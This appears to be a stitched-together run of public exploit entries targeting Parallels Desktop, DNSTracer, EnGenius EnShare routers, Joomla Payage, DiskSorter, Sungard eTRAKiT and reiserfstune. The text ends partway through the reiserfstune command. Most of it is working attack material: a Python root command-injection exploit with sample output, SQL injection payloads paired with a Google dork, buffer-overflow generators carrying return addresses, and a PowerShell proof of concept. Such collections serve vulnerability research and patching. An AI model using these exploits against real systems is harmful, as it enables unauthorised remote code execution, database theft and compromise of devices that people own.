# E-Mail : me[at]reza[dot]es , reza.espargham[at]gmail[dot]com
# Website : www.reza.es
# Twitter : https://twitter.com/rezesp
# FaceBook : https://www.facebook.com/reza.espargham
# Github : github.com/rezasp
# youtube : https://youtu.be/_nZ4y0ZTrwA
#
#
#There is a security issue in the shared folder implementation in Parallels Desktop
#DLL : PrlToolsShellExt.dll 10.2.0 (28956)
#prl_tg Driver
#Very simple exploit with powershell
#powershell.exe poc.ps1
#Write OSX Executable file in temp
[io.file]::WriteAllText($env:temp + '\r3z4.command',"Say 'You are hacked by 1337'")
add-type -AssemblyName microsoft.VisualBasic
add-type -AssemblyName System.Windows.Forms
#open temp in explorer
explorer $env:temp
#wait for 500 miliseconds
start-sleep -Milliseconds 500
#select Temp active window
[Microsoft.VisualBasic.Interaction]::AppActivate("Temp")
#find r3z4.command file
[System.Windows.Forms.SendKeys]::SendWait("r3z4")
#right click
[System.Windows.Forms.SendKeys]::SendWait("+({F10})")
#goto "Open on Mac" in menu
[System.Windows.Forms.SendKeys]::SendWait("{DOWN}")
[System.Windows.Forms.SendKeys]::SendWait("{DOWN}")
[System.Windows.Forms.SendKeys]::SendWait("{DOWN}")
#Click Enter
[System.Windows.Forms.SendKeys]::SendWait("~")
#Enjoy ;)s
################
#Exploit Title: DNSTracer Stack-based Buffer Overflow
#CVE: CVE-2017-9430
#CWE: CWE-119
#Exploit Author: Hosein Askari (FarazPajohan)
#Vendor HomePage: http://www.mavetju.org
#Version : 1.8.1
#Tested on: Parrot OS
#Date: 04-06-2017
#Category: Application
#Author Mail : hosein.askari@aol.com
#Description: Stack-based buffer overflow in dnstracer through 1.9 allows =
attackers to cause a denial of service (application crash) or possibly hav=
e unspecified other impact via a command line with a long name argument tha=
t is mishandled in a strcpy call for argv[0]. An example threat model is a =
web application that launches dnstracer with an untrusted name string.
###############################
#dnstracer -v $(python -c 'print "A"*1025')
*** buffer overflow detected ***: dnstracer terminated
=3D=3D=3D=3D=3D=3D=3D Backtrace: =3D=3D=3D=3D=3D=3D=3D=3D=3D
/lib/x86_64-linux-gnu/libc.so.6(+0x70bcb)[0x7ff6e79edbcb]
/lib/x86_64-linux-gnu/libc.so.6(__fortify_fail+0x37)[0x7ff6e7a76037]
/lib/x86_64-linux-gnu/libc.so.6(+0xf7170)[0x7ff6e7a74170]
/lib/x86_64-linux-gnu/libc.so.6(+0xf64d2)[0x7ff6e7a734d2]
dnstracer(+0x2c8f)[0x5634368aac8f]
/lib/x86_64-linux-gnu/libc.so.6(__libc_start_main+0xf1)[0x7ff6e799d2b1]
dnstracer(+0x2fca)[0x5634368aafca]
=3D=3D=3D=3D=3D=3D=3D Memory map: =3D=3D=3D=3D=3D=3D=3D=3D
5634368a8000-5634368b0000 r-xp 00000000 08:01 4850311 /u=
sr/bin/dnstracer
563436aaf000-563436ab0000 r--p 00007000 08:01 4850311 /u=
sr/bin/dnstracer
563436ab0000-563436ab1000 rw-p 00008000 08:01 4850311 /u=
sr/bin/dnstracer
563436ab1000-563436ab3000 rw-p 00000000 00:00 0=20
563436c1d000-563436c3e000 rw-p 00000000 00:00 0 [h=
eap]
7ff6e7766000-7ff6e777c000 r-xp 00000000 08:01 25823192 /l=
ib/x86_64-linux-gnu/libgcc_s.so.1
7ff6e777c000-7ff6e797b000 ---p 00016000 08:01 25823192 /l=
ib/x86_64-linux-gnu/libgcc_s.so.1
7ff6e797b000-7ff6e797c000 r--p 00015000 08:01 25823192 /l=
ib/x86_64-linux-gnu/libgcc_s.so.1
7ff6e797c000-7ff6e797d000 rw-p 00016000 08:01 25823192 /l=
ib/x86_64-linux-gnu/libgcc_s.so.1
7ff6e797d000-7ff6e7b12000 r-xp 00000000 08:01 25823976 /l=
ib/x86_64-linux-gnu/libc-2.24.so
7ff6e7b12000-7ff6e7d11000 ---p 00195000 08:01 25823976 /l=
ib/x86_64-linux-gnu/libc-2.24.so
7ff6e7d11000-7ff6e7d15000 r--p 00194000 08:01 25823976 /l=
ib/x86_64-linux-gnu/libc-2.24.so
7ff6e7d15000-7ff6e7d17000 rw-p 00198000 08:01 25823976 /l=
ib/x86_64-linux-gnu/libc-2.24.so
7ff6e7d17000-7ff6e7d1b000 rw-p 00000000 00:00 0=20
7ff6e7d1b000-7ff6e7d3e000 r-xp 00000000 08:01 25823455 /l=
ib/x86_64-linux-gnu/ld-2.24.so
7ff6e7f13000-7ff6e7f15000 rw-p 00000000 00:00 0=20
7ff6e7f3a000-7ff6e7f3e000 rw-p 00000000 00:00 0=20
7ff6e7f3e000-7ff6e7f3f000 r--p 00023000 08:01 25823455 /l=
ib/x86_64-linux-gnu/ld-2.24.so
7ff6e7f3f000-7ff6e7f40000 rw-p 00024000 08:01 25823455 /l=
ib/x86_64-linux-gnu/ld-2.24.so
7ff6e7f40000-7ff6e7f41000 rw-p 00000000 00:00 0=20
7ffded62d000-7ffded64e000 rw-p 00000000 00:00 0 [s=
tack]
7ffded767000-7ffded769000 r--p 00000000 00:00 0 [v=
var]
7ffded769000-7ffded76b000 r-xp 00000000 00:00 0 [v=
dso]
ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0 [v=
syscall]
Aborted
#!/usr/bin/env python
# coding: utf8
#
#
# EnGenius EnShare IoT Gigabit Cloud Service 1.4.11 Root Remote Code Execution
#
#
# Vendor: EnGenius Technologies Inc.
# Product web page: https://www.engeniustech.com
# Affected version: ESR300 (1.4.9, 1.4.7, 1.4.2, 1.4.1.28, 1.4.0, 1.3.1.42, 1.1.0.28)
# ESR350 (1.4.11, 1.4.9, 1.4.5, 1.4.2, 1.4.0, 1.3.1.41, 1.1.0.29)
# ESR600 (1.4.11, 1.4.9, 1.4.5, 1.4.3, 1.4.2, 1.4.1, 1.4.0.23, 1.3.1.63, 1.2.1.46, 1.1.0.50)
# EPG5000 (1.3.9.21, 1.3.7.20, 1.3.3.17, 1.3.3, 1.3.2, 1.3.0, 1.2.0)
# ESR900 (1.4.5, 1.4.3, 1.4.0, 1.3.5.18 build-12032015@liwei (5668b74), 1.3.1.26, 1.3.0, 1.2.2.23, 1.1.0)
# ESR1200 (1.4.5, 1.4.3, 1.4.1, 1.3.1.34, 1.1.0)
# ESR1750 (1.4.5, 1.4.3, 1.4.1, 1.4.0, 1.3.1.34, 1.3.0, 1.2.2.27, 1.1.0)
#
# Summary: With the EnGenius IoT Gigabit Routers and free EnShare app, use
# your iPhone, iPad or Android-based tablet or smartphone to transfer
# video, music and other files to and from a router-attached USB hard
# drive. Enshare is a USB media storage sharing application that enables
# access to files remotely. The EnShare feature allows you to access media
# content stored on a USB hard drive connected to the router's USB port in
# the home and when you are away from home when you have access to the Internet.
# By default the EnShare feature is enabled.
#
# EnShareTM supports both FAT32 and NTFS USB formats. Transfer speeds of data
# from your router-attached USB storage device to a remote/mobile device may
# vary based on Internet uplink and downlink speeds. The router's design enables
# users to connect numerous wired and wireless devices to it and supports intensive
# applications like streaming HD video and sharing of media in the home and accessing
# media away from the home with EnShare - Your Personal Media Cloud.
#
# Desc: EnGenius EnShare suffers from an unauthenticated command injection
# vulnerability. An attacker can inject and execute arbitrary code as the
# root user via the 'path' GET/POST parameter parsed by 'usbinteract.cgi'
# script.
#
# =======================================================================
#
# bash-4.4$ python enshare.py 10.0.0.17
# [+] Command: ls -alsh
# 44 -rwxr-xr-x 1 0 0 42.5K Oct 31 2014 getsize.cgi
# 4 -rwxr-xr-x 1 0 0 606 Oct 31 2014 languageinfo.cgi
# 48 -rwxr-xr-x 1 0 0 44.2K Oct 31 2014 upload.cgi
# 48 -rwxr-xr-x 1 0 0 44.5K Oct 31 2014 usbinfo.cgi
# 56 -rwxr-xr-x 1 0 0 54.1K Oct 31 2014 usbinteract.cgi
# 0 drwxr-xr-x 4 0 0 0 Jun 3 00:52 ..
# 0 drwxr-xr-x 2 0 0 0 Oct 31 2014 .
#
# [+] Command: id
# uid=0(root) gid=0(root)
#
# [+] Command: cat /etc/passwd
#
# Connecting to 10.0.0.17 port 9000
#
# HTTP/1.1 200 OK
# root: !:0:0:root:/root:/bin/sh
# administrator: *:65534:65534:administrator:/var:/bin/false
# admin: *:60000:60000:webaccount:/home:/usr/bin/sh
# guest: *:60001:60000:webaccount:/home:/usr/bin/sh
# Content-type: text/html
# Transfer-Encoding: chunked
# Date: Sat, 03 Jun 2017 13:48:14 GMT
# Server: lighttpd/1.4.31
#
# 0
# [+] Command: pwd
# /www/web/cgi-bin
# [+] Command: cat /etc/account.conf
#
# HTTP/1.1 200 OK
# 1: admin:admin:4
# 1: guest:guest:1
# Content-type: text/html
# Transfer-Encoding: chunked
# Date: Sat, 03 Jun 2017 14:53:42 GMT
# Server: lighttpd/1.4.31
# bash-4.4$
#
# =======================================================================
#
# Tested on: Linux 2.6.36 (mips)
# Embedded HTTP Server ,Firmware Version 5.11
# lighttpd/1.4.31
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# @zeroscience
#
#
# Advisory ID: ZSL-2017-5413
# Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5413.php
#
#
# 17.05.2017
#
import sys, socket
if len(sys.argv) < 2:
print 'Usage: enshare.py <ip> [port]\n'
quit()
ip = sys.argv[1]
port = 9000 if len(sys.argv) < 3 else int(sys.argv[2])
cmd = raw_input('[+] Command: ')
payload = 'POST /web/cgi-bin/usbinteract.cgi HTTP/1.1\r\n'
payload += 'Host: {0}:{1}\r\n'
payload += 'Content-Length: {2}\r\n'
payload += 'Content-Type: application/x-www-form-urlencoded\r\n\r\n'
payload += 'action=7&path=\"|{3}||\"'
msg = payload.format( ip, port, len(cmd)+19, cmd )
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
target = (ip, port)
print >>sys.stderr, '\nConnecting to %s port %s\n' % target
s.connect(target)
s.sendall(msg)
response = s.recv(5000)
s.close()
print response.strip()
# Exploit Title: Joomla Payage 2.05 - SQL Injection
# Exploit Author: Persian Hack Team
# Discovered by : Mojtaba MobhaM (Mojtaba Kazemi)
# Vendor Home : https://extensions.joomla.org/extensions/extension/e-commerce/payment-systems/payage/
# My Home : http://persian-team.ir/
# Google Dork : inurl:index.php?option=com_payage
# Telegram Channel: @PersianHackTeam
# Tested on: Linux
# Date: 2017-06-03
# POC :
# SQL Injection :
Parameter: aid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: option=com_payage&task=make_payment&aid=1001' AND 6552=6552 AND 'dCgx'='dCgx&tid=c4333ccdc8b2dced3f6e72511cd8a76f&tokenid=
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: option=com_payage&task=make_payment&aid=1001' AND (SELECT * FROM (SELECT(SLEEP(5)))JBKV) AND 'XFWL'='XFWL&tid=c4333ccdc8b2dced3f6e72511cd8a76f&tokenid=
---
http://server/index.php?option=com_payage&task=make_payment&aid=[SQL]&tid=c4333ccdc8b2dced3f6e72511cd8a76f&tokenid=
# Greetz : T3NZOG4N & FireKernel
# Iranian White Hat Hackers
#!/usr/bin/python
######################################
# Exploit Title: DiskSorter v9.7.14 - Input Directory Local Buffer Overflow - PoC
# Date: 25 May 2017
# Exploit Author: n3ckD_
# Vendor Homepage: http://www.disksorter.com/
# Software Link: http://www.disksorter.com/setups/disksorter_setup_v9.7.14.exe
# Version: Disk Sorter v9.7.14 (32-Bit)
# Tested on: Windows 7 Enterprise SP1 (Build 7601)
# Usage: Run the exploit, copy the text of the poc.txt into the 'Inputs -> Add Input Directory' dialog
######################################
print "DiskSorter v9.7.14 (32-Bit) - Input Directory Local Buffer Overflow - PoC"
print "Copy the text of poc.txt into the 'Inputs -> Add Input Directory' dialog"
# in libspg:.text
# 10147C1C 58 POP EAX
# 10147C1D C3 RETN
ret = "\x1c\x7c\x14\x10"
nops = "\x47\x4F"*24
buf = nops + "A"*4048 + ret + "MAGIC" + "\n"
f = open("poc.txt","w")
f.write(buf)
f.close()
Software: Sungard eTRAKiT3
Version: 3.2.1.17 and possibly lower
CVE: CVE-2016-6566 (https://www.kb.cert.org/vuls/id/846103)
Vulnerable Component: Login page
Description
================
The login form is vulnerable to blind SQL injection by an unauthenticated user.
Vulnerabilities
================
The "valueAsString" parameter inside the JSON payload contained by the "ucLogin_txtLoginId_ClientStat" POST parameter is not properly validated. An unauthenticated remote attacker may modify the POST request and insert a SQL query which will then be executed by the backend server. eTRAKiT 3.2.1.17 was tested, but other versions may also be vulnerable.
Proof of concept
================
Steps to Reproduce:
1. Configure browser to use burp suite as proxy
2. Turn interceptor on in burp suite
3. Attempt to log in to etrakit3 website
4. Modify the resulting HTTP request in the following way
5. Locate the JSON payload contained by the ucLogin_txtLoginId_ClientStat POST parameter
6. Locate the valueAsString parameter inside the JSON payload
7. Append SQL code to the end of the value held by the valueAsString parameter, example: {"enabled":true,"emptyMessage":"Username","validationText":"fakeuser","valueAsString":"fakeuser';waitfor delay'0:0:10'--","lastSetTextBoxValue":"fakeuser"}
Solution
================
"SunGard Public Sector appreciates that this issue has been brought to our attention. Our development team has addressed this report with a patch release. Please contact the SunGard Public Sector TRAKiT Solutions division to request the patch release. (858) 451-3030." -- (https://www.kb.cert.org/vuls/id/846103)
Timeline
================
2016-10-17: Discovered
2016-12-6: CVE Issued
Discovered by
================
Chris Anastasio 0x616e6173746173696f [ at ] illumant.com
About Illumant
================
Illumant has conducted thousands of security assessment and compliance engagements, helping over 800 clients protect themselves from cyber-attacks. Through meticulous manual analysis, Illumant helps companies navigate the security and threat landscape to become more secure, less of a target, and more compliant. For more information, visit https://illumant.com/
+] Title: reiserfstune 3.6.25 – Local Buffer Overflow
[+] Credits / Discovery: Nassim Asrir
[+] Author Contact: wassline@gmail.com || https://www.linkedin.com/in/nassim-asrir-b73a57122/
[+] Author Company: Henceforth
[+] CVE: N/A
- Download -
http://www.linuxfromscratch.org/blfs/view/svn/postlfs/reiserfs.html
- Description -
reiserfstune is used for tuning the ReiserFS. It can change two journal
parameters (the journal size and the maximum transaction size), and it
can move the journal’s location to a new specified block device. (The
old ReiserFS’s journal may be kept unused, or discarded at the user’s
option.) Besides that reiserfstune can store the bad block list to the
ReiserFS and set UUID and LABEL. Note: At the time of writing the
relocated journal was implemented for a special release of ReiserFS,
and was not expected to be put into the mainstream kernel until approx-
imately Linux 2.5. This means that if you have the stock kernel you
must apply a special patch. Without this patch the kernel will refuse
to mount the newly modified file system. We will charge $25 to explain
this to you if you ask us why it doesn’t work.
Perhaps the most interesting application of this code is to put the
journal on a solid state disk.
device is the special file corresponding to the newly specified block
device (e.g /dev/hdXX for IDE disk partition or /dev/sdXX for
the SCSI disk partition).
- POC -
/sbin/reiserfstune '-j' 'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2' '-o' 'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2' '-s' 'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2' '-t' 'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2' '-b' 'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2' '-B' 'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2' '-u' 